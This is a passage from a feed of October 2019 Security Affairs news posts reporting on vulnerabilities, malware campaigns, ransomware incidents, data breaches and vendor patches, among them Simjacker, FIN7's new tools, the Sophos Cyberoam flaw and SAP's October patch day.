“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a game pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that such kind of major changes has to be notified to the users.

The good news is that users could turn off the Fraudulent Website Warning feature in Safari, even if they are potentially exposed to online threats.

The feature is enabled by default on iPhones and iPads devices running iOS 13, below the instruction to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

The post Privacy advocates criticize Apple for sharing some users browsing data with Tencent appeared first on Security Affairs.

Talos experts found 11 flaws in Schneider Electric Modicon Controllers

Cisco Talos experts discovered nearly a dozen flaws affecting some of the models of Schneider Electric’s Modicon programmable logic controllers.

Talos experts discovered 11 security flaws affecting some models of Schneider Electric’s Modicon programmable logic controllers.

Affected models are Modicon M580, M340, BMENOC 0311, BMENOC 0321, Quantum, Premium, and Modicon BMxCRA and 140CRA.

The unique model that is affected by all the vulnerabilities is the M580 PLC. The flaws affect the implementation of the ModbusFTP and TFTP protocols, and the REST API. Schneider Electric published four advisories to address the vulnerabilities.

The vulnerabilities in the TFTP and the REST API were tracked with codes between CVE-2019-6841 and CVE-2019-6851, an attacker could exploit them by sending specially crafted requests to the impacted devices.

The vulnerability in the TFTP protocol, tracked as CVE-2019-6851, is a File and Directory Information Exposure issue that could cause the disclosure of information from the controller when using this protocol.

REST API is affected by three vulnerabilities, CVE-2019-6848, CVE-2019-6849, CVE-2019-6850.

CVE-2019-6848 is an uncaught exception issue that could be exploited to cause a Denial of Service condition by sending specific data on the REST API of the controller/communication module.

CVE-2019-6849 is an Information Exposure vulnerability that could cause the disclosure of sensitive information when using specific Modbus services provided by the REST API of the controller/communication module.

CVE-2019-6850 is another Information Exposure vulnerability that could cause the disclosure of sensitive information when reading specific registers with the REST API of the controller/communication module.

Most of the vulnerabilities in the FTP protocol (CVE-2019-6841, CVE-2019-6842, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846, CVE-2019-6847) could be exploited to cause a DoS condition.

Talos researchers reported the vulnerabilities to Schneider Electric in May and July. The company’s advisories provide a series of recommendations for preventing the exploitation of the issues. Talos blog post also includes SNORT rules to detect exploitation attempts.

Pierluigi Paganini

(SecurityAffairs – Schneider Electric Modicon, hacking)

The post Talos experts found 11 flaws in Schneider Electric Modicon Controllers appeared first on Security Affairs.

Charming Kitten Campaign involved new impersonation methods

Iran-linked APT group Charming Kitten employed new spear-phishing methods in attacks carried out between August and September.

Security experts at ClearSky analyzed attacks recently uncovered by Microsoft that targeted a US presidential candidate, government officials, journalists, and prominent expatriate Iranians. Microsoft Threat Intelligence Center (MSTIC) observed the APT group making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.

ClearSky researchers pointed out that these attacks represent a shift in the group tactics because this is the first time that the Charming Kitten group attempted to interfere in the elections of a foreign country.

The experts said, with medium-high confidence, that the campaign uncovered by Microsoft is the same campaign they observed over the past several months.

“We evaluate in a medium-high level of confidence, that Microsoft’s discovery and our findings in our previous and existing reports is a congruent operation” reads the report published by ClearSky, “based on the following issues:

  • Same victim profiles
  • Time overlapping
  • Similar attack vectors”

Iran-linked Charming Kitten group, (aka APT35, PhosphorusNewscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. 

As part of the recently observed campaign, the state-sponsored hackers used three different spear-phishing methods:

  • Ending an email message leveraging social engineering methods.
  • Impersonating social media websites, such as Facebook, Twitter and Instagram, as well as using these social media to spread malicious links. Experts also has observed a few social media entities that used social media to contact their victims in order to trick them into visiting malicious websites.
  • Sending SMS messages to the cellular phone of the victim. The messages include a link and claim to inform the recipient of an attempt to compromise their email account. The link points to a malicious phishing website.

Experts have identified more than eight new and unknown domains, all of which bear the ‘.site’ TL, that were involved in the attacks.

Other technical information, along with indicators of compromise (IoCs) are included in the report.

Pierluigi Paganini

(SecurityAffairs – Charming Kitten, Iran)

The post Charming Kitten Campaign involved new impersonation methods appeared first on Security Affairs.

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced to have restored normal operation after paying the ransom request by crooks that infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted out to pay the ransom and announced to have restored normal operation.

The hospital chain hasn’t revealed the amount it has paid to the crooks to decrypt the data, it seems that an insurance covered the cost.

Recently I reported that several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure. At the time, a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, revealed that the infrastructures had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

The operations at the hospitals were severely impacted for 10 days during which the hospitals kept treating people, but new patients were sent to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The systems at the hospitals have been infected with a variant of the Ryuk ransomware, internal staff reverted to using paper files.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Alabama Hospital chain paid ransom to resume operations after ransomware attack appeared first on Security Affairs.

Security Affairs newsletter Round 235

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Hacker is auctioning a database containing details of 92 million Brazilians
Iran-linked Phosphorus group hit a 2020 presidential campaign
UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities
D-Link router models affected by remote code execution issue that will not be fixed
Data from Sephora and StreetEasy data breaches added to HIBP
PoS malware infections impacted four restaurant chains in the U.S.
US will help Baltic states to secure baltic energy grid
Developer hacked back Muhstik ransomware crew and released keys
Experts found a link between a Magecart group and Cobalt Group
Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild
MS October 2019 Patch Tuesday updates address 59 flaws
Users reported problems with patches for CVE-2019-1367 IE zero-day
Hackers compromised Volusion infrastructure to siphon card details from thousands of sites
Multiple APT groups are exploiting VPN vulnerabilities, NSA warns
Researchers discovered a code execution flaw in NSA GHIDRA
Twitter inadvertently used Phone Numbers collected for security for Ads
vBulletin addresses three new high-severity vulnerabilities
Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware
Attor malware was developed by one of the most sophisticated espionage groups
iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware
Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012
SAP October 2019 Security Patch Day fixes 2 critical flaws
Tor Project is going to remove End-Of-Life relays from the network
Hacker breached escort forums in Italy and the Netherlands and is selling user data
Researchers released a free decryptor for the Nemty Ransomware
Sophos fixed a critical vulnerability in Cyberoam firewalls
Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics
Top cybersecurity certifications to consider for your IT career
FIN7 Hackers group is back with a new loader and a new RAT
Leafly Cannabis information platform suffered a data leak
SIM cards used in 29 countries are vulnerable to Simjacker attack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 235 appeared first on Security Affairs.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns

Confiant researchers have discovered a new Mac malware dubbed Tarmac distributed via malvertising campaigns in the US, Italy, and Japan.

Security experts at Confiant have discovered a new Mac malware dubbed Tarmac that is distributed via malvertising campaigns in the US, Italy, and Japan.

“Malicious ads redirect victims to sites showing popups peddling software updates, mainly Adobe Flash Player updates, that once executed will install first install the OSX/Shlayer MacOS malware, which then execute the final payload, the OSX/Tarmac” reads the analysis.

“Indeed, that’s not the official Adobe installer but a fake Flash Player installer that was signed using an Apple developer certificate 2L27TJZBZM issued probably to a fake identity named : Fajar Budiarto

Malware authors use to sign malware with Apple developer certificates because it is quite easy to do and allow their code to bypass security protections like Gatekeeper and XProtect.

Tarmac

This malvertising campaign distributing the two malware Shlayer and Tarmac began in January, but at the time experts did not spot the Tarmac malicious code.

Tarmac acts as a second-stage payload for the Shlayer infection, experts pointed out that at the time of the analysis the command and control servers had been shut down and the samples they analyzed were relatively old. Experts believe the campaign is still ongoing and threat actors likely changed its infrastructure.

Tarmac gathers information about the infected hardware and sends it to the C2 servers, then it waits for commands.

At the time of the analysis, it was not possible to understand which commands the malware supports because the C&C servers were down.

Experts noticed that most of key components strings are protected with custom encryption and compression in the attempt to thwart analysis.

ZDNet reported that the malvertising campaign that distributed the Shlayer and Tarmac combo was targeted at users located in the US, Italy, and Japan.

The analysis published by the experts also includes additional technical details along with indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Tarmac, malvertising)

The post A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns appeared first on Security Affairs.

FIN7 Hackers group is back with a new loader and a new RAT

FireEye Mandiant discovered that the FIN7 hacking group added new tools to its cyber arsenal, including a module to target remote administration software of ATM vendor.

Security experts at FireEye Mandiant discovered that the FIN7 hacking group has added new tools to its arsenal, including a new loader and a module that hooks into the legitimate remote administration software used by the ATM maker NCR Corporation.

The group that has been active since late 2015 targeted businesses worldwide to steal payment card information. Fin7 is suspected to have hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

In August 2018, three members of the notorious cybercrime gang have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The new loader is able to drop the malware directly in memory, it was dubbed BOOSTWRITE and allows threat actors to load several malicious codes, including the Carbanak backdoor.

Researchers also spotted a new RAT tracked as RDFSNIFFER that is dropped by the BOOSTWRITE loader.

“The first of FIN7’s new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER.” reads the Mandiant report. “While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.”

BOOSTWRITE implements the DLL search order hijacking technique to load its DLLs into the target’s memory that allows it to download the initialization vector (IV) and the decryption two embedded payload DLLs.

Before decrypting the embedded PE32.DLLs payloads the loader performs sanity checks on the results, then load them into memory.

The researchers analyzed several samples of BOOSTWRITE, one of them that was uploaded to VirusTotal on October 3 was signed with a code signing certificate issued by MANGO ENTERPRISE LIMITED.

fin7 detection

The loader was observed delivering the RDFSNIFFER DLL which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER hooks the process of NCR Corporation’s RDFClient, it runs every time the legitimate software for remote administration is executed on the compromised machines.

The malicious code is designed to run man-in-the-middle attacks on connections made using RDFClient, it also allows attackers to upload, download, execute and/or delete arbitrary files.

Below the list of supported commands:

Command NameLegit Function in RDFClientRDFClient Command IDDescription
UploadFileMgrSendFile107Uploads a file to the remote system
DownloadFileMgrGetFile108Retrieves a file from the remote system
ExecuteRunCommand3001Executes a command on the remote system
DeleteRemoteFileMgrDeleteFile3019Deletes file on remote system
DeleteLocalDeletes a local file

In March, the group carried out attacks delivering a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The messages sent to the victims were also dropping the backdoor DNSbot that primarily operates over DNS traffic.

In April 2018, FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

“While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements.” concludes the report.

“Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns.”

Pierluigi Paganini

(SecurityAffairs – FIN7, hacking)

The post FIN7 Hackers group is back with a new loader and a new RAT appeared first on Security Affairs.

SIM cards used in 29 countries are vulnerable to Simjacker attack

Security researchers at Adaptive Mobile who discovered the SimJacker issue have published the list of countries where mobile operators use flawed SIM cards.

Exactly one month ago, researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in many countries. The experts discovered that that the exploitation of the vulnerability is independent of the model of phone used by the victim.

Now Adaptive Mobile published the list of countries where local mobile operators are using SIM cards affected by the Simjacker flaw, anyway the company did not name the impacted mobile phone carriers.

“This varies by country and region. From our analysis we could identify 61 Mobile Operators (excluding MVNOs) in the 29 countries that use this technology.” reads the report. “Based on public reported information the cumulative subscriber numbers of these S@T Browser-using Operators comes to ~861 million mobile connections (SIM cards).” “Not all SIM cards in the operator may use this technology. In discussions with a few operators in the LATAM region we were informed that the majority of SIM Cards (>90%) in their network had it.”

Below the full list of countries published by the experts:

Central America:
Mexcio
Guatemala
Belize
Dominican Republic
El Salvador
Honduras
Panama
Nicaragua
Costa Rica

South America:
Brazil
Peru
Colombia
Ecuador
Chile
Argentina
Uruguay
Paraguay

Africa:
Ivory Coast
Ghana
Benin
Nigeria
Cameroon

Europe:
Italy
Bulgaria
Cyprus

Asia:
Saudi Arabia
Iraq
Lebanon
Palestine

The S@T Browser application is installed on multiple SIM cards, including eSIM, as part of SIM Tool Kit (STK), it enables the SIM card to initiate actions which can be used for various value-added services.

Since S@T Browser implements a series of STK instructions (i.e. send, call, launch browser, provide local data, run command, and send data) that can be executed by sending an SMS to the phone.

The Simjacker attack involves an SMS containing commands that instruct the SIM Card in the phone to ‘take over’ the phone.

The attacker could exploit the flaw to

  • Retrieve targeted device’ location and IMEI information,
  • Spread mis-information by sending fake messages on behalf of victims,
  • Perform premium-rate scams by dialing premium-rate numbers,
  • Spy on victims’ surroundings by instructing the device to call the attacker’s phone number,
  • Spread malware by forcing victim’s phone browser to open a malicious web page,
  • Perform denial of service attacks by disabling the SIM card, and
  • Retrieve other information like language, radio type, battery level, etc.

On October 3rd, the experts presented their research at VB2019 conference in London and they published a technical paper on the attack. The paper shows how the flaw is being exploited by threat actors and privides technical details on technologies used in the attacks.  report.

The experts explained that the attack is transparent to the users, the targets are not able to notice any anomaly.

Adaptive Mobile revealed that a private surveillance firm was aware of the zero-day flaw since at least two years and is actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

“Within the report we outline why we think it is a surveillance company that developed this exploit.” read a FAQs page published by the experts. “However, we have not named the specific company that we believe is responsible, as to do so, we would need to release some additional proof. That proof would also reveal specific methods and information that would impact our ability to protect subscribers.”

Experts also added that the vulnerability has been likely exploited by nation-state actors for targeted attacks on persons of interests.

After the flaw was publicly disclosed, the researchers at SRLabs developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset. SRLabs researchers also updated their SIMTester app to include Simjacker.

Experts at Adaptive Mobile also analyzed the impact of the recently disclosed WIBattack and explained that it impacts a smaller number of users compared with SimJacker. Experts estimated that only 8 operators in 7 countries are using SIM cards vulnerable to the attack.

“WIB is a propriety SIM card technology like S@T which reports show could also be exploited via ‘Simjacker-like’ attacks. However, it’s important to state that we haven’t seen any attacks involving WIB.” concludes the report. “The WIB technology itself seems less prevalent that the S@T Browser (see diagram below and section 7 of the report), and available publicly information doesn’t indicate that WIB has the same apparent oversight in recommended security level.”

The following graph shows the number of Vulnerable Countries & Operators for S@T Browser and WIB.

“This has important implications for all Mobile Operators if they wish to deal with attacks from threat actors like this in the future.” concludes the report.”It means that previous ways of relying on recommendations, with no operational investigation or research won’t be enough to protect the mobile network and its subscribers, and what’s worse, will give a false sense of security.”

Pierluigi Paganini

(SecurityAffairs – SimJacker, hacking)

The post SIM cards used in 29 countries are vulnerable to Simjacker attack appeared first on Security Affairs.

Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics

SafeBreach experts discovered that the HP Touchpoint Analytics service is affected by a potentially serious vulnerability.

Security researchers at SafeBreach have discovered that the HP Touchpoint Analytics service is affected by a serious flaw tracked as CVE-2019-6333. The vulnerability received a CVSS score of 6.7 (medium severity).

The TouchPoint Analytics is a service that allows the vendor to anonymously collect diagnostic data about hardware performance, it comes pre-installed on most HP PCs.

HP Touchpoint Analytics

The service is based on the open-source tool Open Hardware Monitor and it is executed as “NT AUTHORITY\SYSTEM.”

The experts noticed that when the service is started, it attempts to load three missing DLL files. An attacker with administrative privileges on the targeted system can create malicious DLLs with the names of the missing files and place them in the locations where they were expected to be to get executed when the HP service starts.

The experts pointed out that the Touchpoint Analytics service would have high-permission-level access to the PC hardware, this means that a flaw affecting the could be exploited to escalate privileges to SYSTEM and bypass security features.

“The Open Hardware Monitor library provides a signed kernel driver named “WinRing0,” which is extracted and installed during runtime.” reads the analysis published by the experts.

“As you can see, the service was trying to load three missing DLL files, which eventually were loaded from the c:\python27 directory – our PATH environment variable:

  1. atiadlxx.dll
  2. atiadlxy.dll
  3. Nvapi64.dll

The researchers also published a PoC code to show how to use the Open Hardware Monitor library to read and write to physical memory.

The flaw could impact tens of millions of computers running the HP Touchpoint Analytics or Open Hardware Monitor.

“A potential security vulnerability has been identified with certain versions of HP Touchpoint Analytics prior to version 4.1.4.2827.” reads the security advisory published by HP. “This vulnerability may allow a local attacker with administrative privileges to execute arbitrary code via an HP Touchpoint Analytics system service.”

The experts reported the flaw to HP in early July and it was addressed this month with the release of version 4.1.4.2827.

Pierluigi Paganini

(SecurityAffairs – Touchpoint Analytics, hacking)

The post Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics appeared first on Security Affairs.

Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty Ransomware, security researchers have released a free decryptor tool that could be used to recover files.

In mid-August, the Nemty ransomware appeared in the threat landscape, the name of the ransomware comes after the extension it adds to the encrypted file names. The malicious code also deletes their shadow copies to make in impossible any recovery procedure.

Below the ransom note dropped by the Nemty ransomware after the encryption process is completed. Attackers demand the payment of a 0.09981 BTC ransom (roughly $1,000) through a portal hosted on the Tor network.

Nemty ransomware

Crooks used multiple attack vectors to distribute the ransomware, according to the popular malware researcher Vitali Kremez, the ransomware is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor tool that works on Nemty versions 1.4 and 1.6, they also announced a working tool for version 1.5.

The security form is also working with Europol to get its decryptors included in their NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions, anyway, researchers are working to improve it and support other file types.

Tesorion is not allowing victims to generate the decryption keys with their client, instead, it is allowing victims to retrieve the decryption key by generating it on its own servers.

Victims can contact the Tesorion CSIRT and request help with the Nemty Ransomware, in turn the company will then send a link to the decryptor that will allow you to decrypt the files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims can upload their files on the Tesorion serves that will use it to calculate the decryption key, then the key is sent back to the victims that can load is in the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)

The post Researchers released a free decryptor for the Nemty Ransomware appeared first on Security Affairs.

Hacker breached escort forums in Italy and the Netherlands and is selling user data

Popular prostitution and escort forums in Italy and the Netherlands have been hacked and data have been offered for sale in the cybercrime underground.

A Bulgarian hacker known as InstaKilla has breached two online escort forums and stole the user information that he is now offering for sale on a hacking forum.

The two escort forums are EscortForumIt.xxx and Hookers.nl, it is used by sex workers and their customers in Italy and the Netherlands, both websites have confirmed the breaches.

Experts reports that also a forum for the Zooville zoophilia and bestiality fans was hacked and data offered for sale.

The Dutch news site NOS revealed that a hacker is selling the Dutch hookers.nl forum database for $300 on online forums. The exposed data includes user names, hashed passwords, and IP addresses for roughly 250,000 members.

The account details of the 250,000 users of the Dutch website Hookers.nl have been leaked. This includes e-mail addresses. The website is popular among visitors to prostitutes and escorts, who exchange experiences and tips.” reported the NOS website.

“A hacker has captured the data from the members and offers it for sale, according to a study by the NOS after reporting an anonymous source.”

The hacker is also selling 33,000 records stolen from the Italian forum.

Both escort forums were running outdated versions of the popular vBulletin forum software. At the end of September, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin (CVE-2019-16759). A few days later, the security expert Troy Mursch observed a botnet that it utilizing the recently disclosed vBulletin exploit to secure vulnerable servers to avoid that can be compromised by other threat actors. Likely, the Bulgarian hacker has exploited the same flaw to compromise the escort forums that were not updated by their admins.

“According to a sample of the data obtained by ZDNet, in the case of the Dutch forum, the hacker also appears to have gained access to the site’s internal paid subscription system, although there was no financial information included in the sample we received.” reported ZDNet.

InstaKilla is the same hacker who stole data from millions of Bulgarians in July and sent it to local media, the hacker is now offering for sale data from tens of other vBulletin-based forums.

Users of the escort forums are potentially exposed to extortion phishing campaigns similar to what has happened after the Ashley Madison hack.

Pierluigi Paganini

(SecurityAffairs – escort forums, vBulletin)

The post Hacker breached escort forums in Italy and the Netherlands and is selling user data appeared first on Security Affairs.

Security Affairs 2019-10-11 00:14:11

A vulnerability in Sophos Cyberoam firewalls could be exploited by an attacker to gain access to a target’s internal network without authentication.

Sophos addressed a vulnerability in its Cyberoam firewalls that could be exploited by an attacker to gain access to a company’s internal network without providing a password.

“A critical shell injection vulnerability in Sophos Cyberoam Firewall appliances running CyberoamOS (CROS) version 10.6.6 MR-5 and earlier was recently discovered and responsibly disclosed to Sophos by an external security researcher.” reads the advisory published by Sophos.

“The vulnerability can be potentially exploited by sending a malicious request to either the Web Admin or SSL VPN consoles, which would enable an unauthenticated remote attacker to execute arbitrary commands.”

Cyberoam firewall

The vulnerability is a critical shell injection vulnerability that could allow a remote attacker to gain “root” permissions on vulnerable equipment, it could be exploited by sending malicious commands across the internet.

The vulnerability, tracked as CVE-2019-17059, was discovered by the security expert Rob Mardisalu that reported it to Sophos. The expert also reported the issue to Techcrunch that first reported the news.

“We’ve been working hard with internal and external security researchers to uncover serious remotely exploitable loopholes in SSL VPNs and Firewalls like Cyberoam, Fortigate and Cisco VPNs.” reads the security advisory published by the expert. “This Cyberoam exploit, dubbed CVE-2019-17059 is a critical vulnerability that lets attackers access your Cyberoam device without providing any username or password. On top of that, the access granted is the highest level (root), which essentially gives an attacker unlimited rights on your Cyberoam device.”

Cyberoam firewalls are used in large enterprises, they offer stateful and deep packet inspection for network, application and user identity-based security. Cyberoam Firewall protects organizations from DoS, DDoS and IP Spoofing attacks.

Mardisalu revealed that according to Shodan there are more than 96,000 internet-facing Cyberoam devices worldwide, most of them in enterprises, universities and banks.

The flaw is similar to the recently disclosed vulnerabilities in Palo Alto Networks, Pulse Secure and Fortinet VPN solutions.

“It’s a similar vulnerability to recently disclosed flaws in corporate VPN providers, notably Palo Alto Networks, Pulse Secure and Fortinet, which allowed attackers to gain access to a corporate network without needing a user’s password.” reported TechCrunch “Many large tech companies, including Twitter and Uber, were affected by the vulnerable technology, prompting Homeland Security to issue an advisory to warn of the risks.”

The flaw affects Cyberoam Firewalls running CROS 10.6.6 MR-5 and earlier, Sophos plans to include a fix in the next update of its CyberoamOS operating system.

“There are a small amount of devices that have not as of yet been patched because the customer has turned off auto-update and/or are not internet-facing devices.” said the spokesperson.

The researcher will release the proof-of-concept code in the coming months.

Pierluigi Paganini

(SecurityAffairs – Cyberoam firewalls, hacking)

The post appeared first on Security Affairs.

Attor malware was developed by one of the most sophisticated espionage groups

New espionage malware found targeting Russian-speaking users in Eastern Europe

ESET found an advanced malware piece of malware named Attor, targeting diplomats and high-profile Russian-speaking users in Eastern Europe.

ESET researchers discovered an advanced malware piece of malware named Attor, that was used in cyberespionage operations on diplomats and high-profile Russian-speaking users in Eastern Europe.

Attor malware

Threat actors have been using Attor since 2013, the malicious code remained under the radar until last year.

The researchers believe that the threat actor behind Attor a state-sponsored group involved in highly targeted attacks on selected targets.

Attor’s espionage operation is highly targeted – we were able to trace Attor’s operation back to at least 2013, yet, we only identified a few dozen victims.” reads the analysis published by ESET.

“For example, in order to be able to report on the victim’s activities, Attor monitors active processes to take screenshots of selected applications. Only certain applications are targeted – those with specific substrings in the process name or window title.”

The researchers believe that the malware was specifically developed to infect mainly Russian-speaking users, it targets popular Russian apps and services, including the social networks Odnoklassniki, and VKontakt, VoIP provider Multifon, IM apps Qip and Infium, search engine Rambler, email clients Yandex and Mail.ru, and payment system WebMoney.

The malware implements a modular structure with a dispatcher and loadable plugins, all of which are implemented as dynamic-link libraries (DLLs). The attackers first compromise the target dropping the components on disk, then loads the dispatcher DLL.

The Attor malware makes sophisticated use of encryption to hide its components.

The plugins are delivered as DLLs asymmetrically encrypted with RSA, then they are recovered in memory, using the public RSA key embedded in the dispatcher.

“In total, the infrastructure for C&C communication spans four Attor components – the dispatcher providing encryption functions, and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication.” continues the analysis. “This mechanism makes it impossible to analyze Attor’s network communication unless all pieces of the puzzle have been collected. “

“We were able to recover eight of Attor’s plugins, some in multiple versions – we list them in Table 2. Assuming the numbering of plugins is continuous, and that actors behind Attor may use different sets of plugins on a per‑victim basis, we suspect there are even more plugins that have not yet been discovered. ” continues the analysis.

The analysis of the samples of the malware revealed the presence of an interesting module designed to detect when users connected modems and older phones to their devices. The malware is able to collect info about the files present on connected devices.

“The most curious plugin in Attor’s arsenal collects information about both connected modem/phone devices and connected storage drives, and about files present on these drives. It is responsible for collection of metadata, not the files themselves, so we consider it a plugin used for device fingerprinting, and hence likely used as a base for further data theft.” reads the report.

“While Attor’s functionality of fingerprinting storage drives is rather standard, its fingerprinting of GSM devices is unique.”

Attor’s device monitoring module implements a unique fingerprinting feature of GSM devices. Whenever a modem or a phone device is connected to a COM port, Device monitor uses AT commands to communicate with it.

ESET believes that the authors of the Attor malware developed this module to target users owning older mobile handsets, or even a custom GSM-capable platform.

“A more likely explanation of the plugin’s main motive is that it targets modems and older phones. Alternatively, it may be used to communicate with some specific devices (used by the victim or target organization) that are connected to the COM port or to the USB port using a USB-to-serial adaptor.” concludes the analysis. “In this scenario, it is possible the attackers have learned about the victim’s use of these devices using some other reconnaissance techniques.”

Pierluigi Paganini

(SecurityAffairs – Attor, malware)

The post Attor malware was developed by one of the most sophisticated espionage groups appeared first on Security Affairs.

SAP October 2019 Security Patch Day fixes 2 critical flaws

SAP addressed two critical vulnerabilities (Hot News) as part of the October 2019 Security Patch Day.

SAP has released its October 2019 Security Patch Day updates that also address two critical vulnerabilities (Hot News) with CVSS scores of 9.3 and 9.1.

The October 2019 Security Patch Day also includes a High Priority Note addressing Binary Planting vulnerability.

“With only nine new and one updated Security Note, SAP has published an unusually low number of Security Notes for October 2019.” reads the analysis published by security firm Onapsis. “This is the lowest number of newly published notes in the past five years. Nevertheless, with 2 HotNews Notes and one High Priority Note, this Patch Day deserves special attention as an attacker needs only one vulnerability for a successful attack.”

The most severe SAP Security Note is #2826015, a Missing Authentication Check in AS2 Adapter of B2B Add-On for SAP NetWeaver Process Integration. The vulnerability, tracked as CVE-2019-0379, could be exploited by remote attackers to steal or manipulate sensitive data, it could also provide attackers with access to administrative and other privileged functionality.

“The adapter specifies a comprehensive set of data security features, specifically data confidentiality and data authenticity, which are aimed at the B2B commerce environment. The configuration of the AS2 adapter allows two different security providers.” reads the analysis published by Onapsis. “Depending on the selected provider, a Missing Authentication vulnerability exists that can lead to sensitive data theft or data manipulation as well as to access to administrative and other privileged functionalities.”

The vulnerability received a CVSS score of 9.3.

The second Hot News (SAP Security Note #2828682) addresses a flaw tracked as CVE-2019-0380, it is an information disclosure flaw in SAP Landscape Management enterprise edition. the flaw affects version 3.0 and received a CVSS score of 9.1.

“SAP Security Note #2828682 talks about a risk of information disclosure if these custom parameters fulfill specific conditions. SAP describes the overall conditions for the existence of the vulnerability as “uncommon”.  “

The vulnerability is related to the custom parameters that can be added by users to providers assigned to custom operations.

SAP October 2019 Security Patch Day

